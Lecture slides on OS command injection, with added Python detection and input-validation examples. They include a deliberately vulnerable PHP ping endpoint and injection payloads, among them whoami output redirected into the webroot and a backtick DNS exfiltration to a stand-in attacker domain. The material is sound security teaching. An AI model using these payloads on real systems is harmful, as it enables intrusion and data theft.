08-Command_Injection.pptx

Command Injection is a vulnerability that allows attackers to execute arbitrary OS commands on a server, primarily affecting applications written in interpreted languages like PHP, Python, and Ruby. This can lead to severe consequences, including data compromise and unauthorized access to system resources. Prevention strategies include avoiding OS command calls, implementing strict input validation, and automating testing for command injection vulnerabilities.

Uploaded by Brian Mackwan

Command Injection

Kameswari Chebrolu
Department of CSE, IIT Bombay
Command Injection
● Attacker can execute arbitrary (OS) commands on a host running the server
– Occurs when a web application runs OS commands to interact with the host and file systems
– Exploits an application vulnerability, such as insufficient input validation
● Can fully compromise the application and its data
– Can also compromise other systems in the organization by exploiting trust relationships
● Hard with programming languages like Java that run in a virtual machine
– Also doesn't gel with their philosophy
● Applications should be designed to be portable between different operating systems → cannot rely on specific OS functions
● OS commands are more common with interpreted languages (e.g. PHP, Ruby, Python)
– Python and Ruby are popular for scripting tasks → they support OS command execution well!
Code vs Command Injection
● Code injection: any type of attack that involves injection of code
– Malicious code is executed in the language of the application and within the application context
– Made possible by a lack of proper data validation
– Confined to the application or system (depends on permissions granted)
– Examples: XSS (JavaScript code injection), complex deserialization attacks
● Command injection: any type of attack that involves executing commands in a system shell
– Shell: a command-line interpreter that provides a user interface for accessing an operating system's services
– Extends the default functionality of the application
● No malicious code is involved
– Often gives the attacker greater control over the target system
(Diagram) 1. Attacker sends shell payload → 2. Server executes command → 3. OS returns output → 4. Page with output is sent back, if any
Testing the ground
● Consider a server that checks if a specified server is reachable
– URL: https://vulnerable-website.com/pingStatus?domain=www.cse.iitb.ac.in
– PHP code may look like this
● echo '<pre>';
● $domain = $_GET['domain'];
● echo shell_exec("ping -c 1 $domain");   // $domain is interpolated, unvalidated, into the shell command
● echo '</pre>';
– shell_exec executes a shell command and returns its output as a string; echo prints that output
● Attacker could submit
– https://vulnerable-website.com/pingStatus?domain=www.cse.iitb.ac.in; echo gotcha
– ";" chains commands together (in bash)
– echo outputs the string supplied
● If the attacker sees "gotcha" in the reply → attack feasible
● The injected command echo above is pretty harmless!
● More dangerous commands can permit the attacker to explore the filesystem, read sensitive information, and compromise the entire application
– id command can identify which "user" is running the web application on the server
● The corresponding user permissions determine the severity of the vulnerability
– cat command can permit the attacker to read the site's code
Note
● Different OSes have different command separators
– ; and && and || work in Linux
– & is used in Windows
Other Useful Commands
● Name of current user: whoami (both Linux and Windows)
● Operating system: uname -a (Linux); ver (Windows)
● Network configuration: ifconfig (Linux); ipconfig /all (Windows)
● Network connections: netstat -an (both)
● Running processes: ps -ef (Linux); tasklist (Windows)
● Directory: ls (Linux); dir (Windows)
Blind Command Injection
● Application does not return the output of the command in the HTTP response
● How to check?
– Inject the following: "; ping -c 10 127.0.0.1"
– The above command will cause the app to ping the loopback address for 10 sec (10 packets, one every sec)
– This triggers a time delay, which confirms the command was executed
How to exploit?
● Redirect the output of the injected command to a file in the webroot
● The file can then be retrieved by the browser
● Example:
– Injection command: "www.cse.iitb.ac.in; whoami > /var/www/static/whoami.txt ;"
● Applications often serve static content from /var/www/static
● The > character redirects the output of the command "whoami" to the specified file in the webroot
– Browser can fetch the file via https://vulnerable-website.com/whoami.txt
● Another example:
– Injected command: "www.cse.iitb.ac.in; dig `whoami`.web-attacker.com"
– Backticks perform inline execution of an injected command within the original command
– This causes a DNS lookup to the attacker's domain
● Attacker can parse the query to extract the sensitive info
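The probes described on the last few slides (the "; echo gotcha" check, the ping time delay, output redirected into the webroot, and the backtick DNS lookup) leave distinctive traces in the web server's access log. The following is an added example, not part of the lecture: a small Python scanner that URL-decodes the query parameters of Common Log Format lines and flags values containing shell metacharacters or those specific probes. The log lines, client addresses and vulnerable-website.com paths are constructed for the example, and all function names are the example's own.

```python
"""Detect OS command injection probes in web access logs.

Added example (not part of the lecture slides).  It parses Common Log Format
lines, URL-decodes each query parameter and flags values that contain shell
metacharacters or the blind-injection probes described on the slides.
All log lines below are constructed sample data.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Client IP, timestamp and the request line of a Common Log Format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Command separators on Linux (; | && ||) and Windows (&), plus a raw newline.
SEPARATORS = re.compile(r"[;&|\n]")
# Inline execution: backticks or $( ... ).
SUBSTITUTION = re.compile(r"`|\$\(")
# Output / input redirection.
REDIRECTION = re.compile(r"[<>]")
# Blind-injection probes from the slides: a ping-based time delay and a write into the webroot.
TIMING_PROBE = re.compile(r"\bping\s+-c\s+\d+", re.IGNORECASE)
WEBROOT_WRITE = re.compile(r">\s*/var/www/")


def classify(value):
    """Return the list of suspicious categories found in one decoded parameter value."""
    tags = []
    if SEPARATORS.search(value):
        tags.append("separator")
    if SUBSTITUTION.search(value):
        tags.append("inline-execution")
    if REDIRECTION.search(value):
        tags.append("redirection")
    if TIMING_PROBE.search(value):
        tags.append("timing-probe")
    if WEBROOT_WRITE.search(value):
        tags.append("webroot-write")
    return tags


def scan_line(line):
    """Parse one log line; return (ip, param, decoded_value, tags) for every flagged parameter."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("path")).query
    findings = []
    # parse_qs percent-decodes the values, so %3B becomes ';' before classification.
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            tags = classify(value)
            if tags:
                findings.append((m.group("ip"), param, value, tags))
    return findings


def scan_log(text):
    """Scan a whole log; findings are returned in log order."""
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]


# Constructed sample: one legitimate request followed by the four probes from the slides.
SAMPLE_LOG = """\
10.0.0.5 - - [09/May/2016:10:00:00 +0000] "GET /pingStatus?domain=www.cse.iitb.ac.in HTTP/1.1" 200 512
10.0.0.9 - - [09/May/2016:10:00:07 +0000] "GET /pingStatus?domain=www.cse.iitb.ac.in%3B%20echo%20gotcha HTTP/1.1" 200 530
10.0.0.9 - - [09/May/2016:10:00:15 +0000] "GET /pingStatus?domain=%3B%20ping%20-c%2010%20127.0.0.1 HTTP/1.1" 200 400
10.0.0.9 - - [09/May/2016:10:00:40 +0000] "GET /pingStatus?domain=www.cse.iitb.ac.in%3B%20whoami%20%3E%20/var/www/static/whoami.txt%20%3B HTTP/1.1" 200 400
10.0.0.9 - - [09/May/2016:10:01:02 +0000] "GET /pingStatus?domain=www.cse.iitb.ac.in%3B%20dig%20%60whoami%60.web-attacker.com HTTP/1.1" 200 400
"""

if __name__ == "__main__":
    for ip, param, value, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} {param}={value!r} -> {', '.join(tags)}")
```

Running the script prints one line per flagged request; the legitimate first request produces nothing. The signatures are deliberately narrow (the page's own separator characters plus the two blind-injection patterns), so a production rule set would extend them, but the decode-then-classify order is the part that matters: matching on the raw, still percent-encoded URL would miss every one of these probes.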
Prevention
● Do not call OS commands from application-layer code
– Use safer platform-based APIs
– E.g. if a developer wants to send mail using PHP
● Do not use the mail command available in the OS
● Use the mail() function in PHP
– Can enforce this by disabling dangerous functions
● E.g. configure the php.ini file to block dangerous commands by adding the line below
– disable_functions=exec,passthru,shell_exec,system
● If unavoidable (e.g. ping is not supported in PHP), do input validation
– Validate against a whitelist of permitted values
– Validate that the input is a number or an IP address (based on context)
– Validate that the input contains only alphanumeric characters, no other syntax or whitespace
– Remember input can come not only from GET/POST but also from HTTP headers, JSON or XML data etc.
● If possible, avoid blacklisting or sanitizing input by escaping shell metacharacters
– Too error prone; a determined attacker can often bypass it
– In PHP, you could use the escapeshellarg and escapeshellcmd functions
● $domain = escapeshellarg($_GET['domain']);
– If blacklisting is unavoidable, filter or escape the following special characters:
● Windows: ( ) < > & * ' | = ? ; [ ] ^ ~ ! . " % @ / \ : + , `
● Linux: { } ( ) < > & * ' | = ? ; [ ] $ - # ~ ! . " % / \ : + , `
● To avoid shell interpretation altogether, one can also invoke calls with arrays instead of strings
● In Python (first option is bad: it builds a single string that a shell parses!)
● from subprocess import call
  command = "dig " + domain
  call(command, shell=True)   # the shell parses the whole string, so "; echo gotcha" inside domain runs as a second command
vs
● from subprocess import call
  call(["dig", domain])       # argument list: domain is one argv element and no shell is involved
● In Ruby (similar to Python)
● system("dig #{domain}")     # single string → handed to a shell
vs
● system("dig", domain)       # separate arguments → no shell
● Automate testing for command injection in the build pipeline
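Putting the prevention advice together, as an added Python example that is not from the slides: the user-supplied target is validated as an IP literal or a well-formed hostname (optionally against a whitelist), and only then passed to ping as one element of an argument list, so no shell ever parses it. shlex.quote is included as Python's counterpart to PHP's escapeshellarg for the discouraged case where a shell string cannot be avoided. The function names (validate_target, is_valid_target, ping_argv, run_ping, quote_for_shell) are the example's own.

```python
"""Target validation plus shell-free invocation for the pingStatus use case.

Added example, not code from the slides.  Names are this example's own.
"""
import ipaddress
import re
import shlex
import subprocess

# Hostname grammar: labels of 1-63 letters, digits and hyphens that neither start nor end
# with a hyphen, joined by dots, at most 253 characters in total.  Nothing else is admitted,
# so separators, quotes, whitespace, redirections and backticks can never reach the command.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def validate_target(raw, allowlist=None):
    """Return the target if it is an IP literal or a well-formed hostname, else raise ValueError.

    With an allowlist only exactly those values are accepted (the strictest option on
    the slides).  The grammar also rejects a leading '-', which stops a value from being
    read as an option by the invoked tool.
    """
    value = raw.strip()
    if not value:
        raise ValueError("empty target")
    if allowlist is not None:
        if value in allowlist:
            return value
        raise ValueError(f"target not in allowlist: {raw!r}")
    try:
        return str(ipaddress.ip_address(value))  # IPv4 or IPv6 literal
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"invalid target: {raw!r}")


def is_valid_target(raw, allowlist=None):
    """Boolean wrapper around validate_target, convenient for request filters and tests."""
    try:
        validate_target(raw, allowlist)
        return True
    except ValueError:
        return False


def ping_argv(raw, count=1):
    """Build ping's argument vector.  The validated target is a single argv element and the
    count is coerced to int, so the list never contains anything a shell could interpret."""
    return ["ping", "-c", str(int(count)), validate_target(raw)]


def run_ping(raw):
    """Run ping without a shell (subprocess.run defaults to shell=False) and return its stdout."""
    result = subprocess.run(ping_argv(raw), capture_output=True, text=True, timeout=15)
    return result.stdout


def quote_for_shell(raw):
    """Python's counterpart to PHP's escapeshellarg, for the discouraged case where a shell
    string cannot be avoided.  The whole value becomes one single-quoted word, so a payload
    such as "; echo gotcha" is handed to ping as part of the hostname rather than executed."""
    return shlex.quote(raw)


if __name__ == "__main__":
    for candidate in ["www.cse.iitb.ac.in", "127.0.0.1", "www.cse.iitb.ac.in; echo gotcha"]:
        print(f"{candidate!r:45} valid={is_valid_target(candidate)}")
    print(quote_for_shell("www.cse.iitb.ac.in; echo gotcha"))
```

The validation step is what carries the security here; the argument list removes the shell from the picture, and quote_for_shell exists only to show what escapeshellarg-style quoting does to the "; echo gotcha" payload. As the slides say, the array form is the one to reach for.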
Real World Example
Polyvore ImageMagick: https://nahamsec.wordpress.com/2016/05/09/exploiting-imagemagick-on-yahoo/
Summary
● Command Injection allows an attacker to execute arbitrary (OS) commands on a host running the server
– Difficult in Java, but possible in PHP, Python, Ruby
● Dangerous commands can permit the attacker to explore the filesystem, read sensitive information, and compromise the entire application
– Blind command injection can also be leveraged
● Prevention: do not call OS commands; input validation via whitelisting, blacklisting; automate testing for injection
References
● https://portswigger.net/web-security/os-command-injection
